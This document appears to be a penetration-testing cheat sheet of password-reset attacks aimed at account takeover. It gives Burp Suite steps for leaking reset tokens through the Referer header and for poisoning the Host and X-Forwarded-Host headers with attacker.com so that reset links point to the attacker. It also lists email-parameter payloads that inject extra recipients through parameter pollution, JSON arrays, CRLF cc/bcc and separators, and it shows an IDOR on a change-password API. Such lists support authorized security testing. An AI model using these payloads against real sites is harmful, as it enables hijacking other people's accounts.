Password Reset Token Leak via Referrer

1. Request password reset to your email address
2. Click on the password reset link
3. Don't change password
4. Click any 3rd party websites(eg: Facebook, twitter)
5. Intercept the request in Burp Suite proxy
6. Check if the referer header is leaking password reset token.

Account Takeover Through Password Reset Poisoning

1. Intercept the password reset request in Burp Suite

2. Add or edit the following headers in Burp Suite : Host: attacker.com, X-Forwarded-Host: attacker.com

3. Forward the request with the modified header

   POST <https://example.com/reset.php> HTTP/1.1
   Accept: */*
   Content-Type: application/json
   Host: attacker.com
   

4. Look for a password reset URL based on the host header like : https://attacker.com/reset-password.php?token=TOKEN

Password Reset via Email Parameter

# parameter pollution
[email protected]&[email protected]# array of emails
{"email":["[email protected]","[email protected]"]}

# carbon copy
[email protected]%0A%0Dcc:[email protected]
[email protected]%0A%0Dbcc:[email protected]# separator
[email protected],[email protected]
[email protected]%[email protected]
[email protected]|[email protected]

IDOR on API Parameters

1. Attacker have to login with their account and go to the Change password feature.

2. Start the Burp Suite and Intercept the request

3. Send it to the repeater tab and edit the parameters : User ID/email

   POST /api/changepass
   [...]
   ("form": {"email":"[email protected]","password":"securepwd"})